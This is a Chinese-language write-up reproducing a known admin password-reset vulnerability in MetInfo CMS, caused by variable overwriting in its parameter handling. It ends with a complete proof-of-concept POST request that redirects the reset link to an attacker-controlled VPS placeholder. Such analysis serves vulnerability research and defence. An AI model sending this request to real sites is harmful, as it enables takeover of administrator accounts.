前言
在先知看到了一篇分析该漏洞的文章,复现分析一下,漏洞还是比较有趣的。
正文
首先知道是 管理员密码重置时出现的问题,于是抓包,定位到相关的php文件。
首先包含了 ../include/common.inc.php , 在这个文件中可以搞清楚对我们提交参数的处理。
把提交的参数注册为变量, 这样的代码非常容易形成变量覆盖漏洞。
在 getpassword.php 中 首先注册提交的参数为变量,然后生成重置密码的连接,最后发送出去。问题就出在发送链接的流程中。
发送时首先通过 jmailsend 发送,如果发送失败,则使用 curl_post 重发一遍。
curl_post中会向 met_host:80 发送 POST 数据, 而我们可以利用 变量覆盖 设置 met_host 为我们自己的 vps, 然后我们就可以接收到密码重置连接了。
下面就是要让程序能进入该流程。
在 jmailsend 中 met_fd_port 为邮件服务器的 端口,我们使用 变量覆盖 设置 met_fd_port 为一个随机端口,就会导致 $mail->Send() 发送失败 返回 false, 然后就可以进入 curl_post。
最后的 poc:
POST /admin/admin/getpassword.php HTTP/1.1
Host: hack.metinfo.net
Content-Length: 115
Cache-Control: max-age=0
Origin: http://hack.metinfo.net
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://hack.metinfo.net/admin/admin/getpassword.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: XDEBUG_SESSION=10334; re_url=http%3A%2F%2Fhack.metinfo.net%2Fadmin%2F
Connection: close
action=next2&abt_type=2&admin_mobile=admin&submit=%E4%B8%8B%E4%B8%80%E6%AD%A5&met_fd_port=8569&met_host=your_vps_ip
vps的 80端口就可以接收到
总结
拿到一套程序首先看看对提交数据的处理,如果有 变量覆盖 漏洞,就去可能出现漏洞的功能代码里面看看能不能利用 变量覆盖 漏洞,一些不好静态看的东西,可以自己测试一下。
参考